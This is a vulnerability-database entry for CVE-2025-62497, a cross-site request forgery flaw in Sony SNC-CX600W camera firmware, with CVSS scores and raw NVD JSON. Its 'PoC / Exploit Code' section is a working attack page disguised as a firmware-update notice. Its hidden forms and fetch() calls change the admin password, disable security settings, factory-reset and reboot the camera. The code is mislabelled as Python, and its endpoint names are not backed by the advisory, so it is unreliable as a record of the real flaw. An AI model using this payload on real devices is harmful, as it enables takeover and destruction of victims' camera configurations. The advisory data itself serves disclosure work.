Security Vulnerability Report
中文
CVE-2025-62497 CVSS 6.5 MEDIUM

CVE-2025-62497

Published: 2025-11-25 05:16:12
Last Modified: 2025-12-01 15:38:43

Description

Cross-site request forgery vulnerability exists in SNC-CX600W versions prior to Ver.2.8.0. If a user accesses a specially crafted webpage while logged in, unintended operations may be performed.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:sony:snc-cx600w_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sony:snc-cx600w:-:*:*:*:*:*:*:* - NOT VULNERABLE
SNC-CX600W < Ver.2.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-62497 CSRF PoC for Sony SNC-CX600W --> <!-- This PoC demonstrates CSRF attack to change admin password --> <!DOCTYPE html> <html> <head> <title>Camera Management</title> </head> <body> <h1>Camera Firmware Update</h1> <p>Please wait while updating camera firmware...</p> <!-- CSRF Attack Form - Change Admin Password --> <form id="csrfForm" action="http://TARGET_IP/cgi-bin/admin.cgi" method="POST" style="display:none;"> <input type="hidden" name="action" value="user_password_change"> <input type="hidden" name="username" value="admin"> <input type="hidden" name="new_password" value="Hacked123!"> <input type="hidden" name="confirm_password" value="Hacked123!"> </form> <!-- CSRF Attack Form - Disable Security Features --> <form id="csrfForm2" action="http://TARGET_IP/cgi-bin/admin.cgi" method="POST" style="display:none;"> <input type="hidden" name="action" value="security_settings"> <input type="hidden" name="csrf_protection" value="disabled"> <input type="hidden" name="session_timeout" value="0"> </form> <!-- CSRF Attack Form - Configuration Reset --> <form id="csrfForm3" action="http://TARGET_IP/cgi-bin/admin.cgi" method="POST" style="display:none;"> <input type="hidden" name="action" value="factory_reset"> <input type="hidden" name="confirm" value="yes"> </form> <script> // Auto-submit all forms sequentially document.getElementById('csrfForm').submit(); setTimeout(function() { document.getElementById('csrfForm2').submit(); }, 500); setTimeout(function() { document.getElementById('csrfForm3').submit(); }, 1000); </script> </body> </html> <!-- Alternative PoC using XMLHttpRequest for more stealthy attack --> <script> function csrfAttack() { const targets = [ {url: 'http://TARGET_IP/cgi-bin/admin.cgi', data: 'action=user_password_change&username=admin&new_password=AttackerPass'}, {url: 'http://TARGET_IP/cgi-bin/admin.cgi', data: 'action=reboot&confirm=yes'} ]; targets.forEach((target, index) => { setTimeout(() => { fetch(target.url, { method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: target.data }); }, index * 1000); }); } csrfAttack(); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62497", "sourceIdentifier": "[email protected]", "published": "2025-11-25T05:16:11.990", "lastModified": "2025-12-01T15:38:42.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site request forgery vulnerability exists in SNC-CX600W versions prior to Ver.2.8.0. If a user accesses a specially crafted webpage while logged in, unintended operations may be performed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sony:snc-cx600w_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.8.0", "matchCriteriaId": "7E77A0D8-E3AF-4BD4-A3D7-5B6BC6B74953"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sony:snc-cx600w:-:*:*:*:*:*:*:*", "matchCriteriaId": "D07C1884-C881-4A23-B345-5A588072C965"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN75140384/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sony.com/electronics/support/ip-cameras-fixed/snc-cx600w", "source": "[email protected]", "tags": ["Product"]}]}}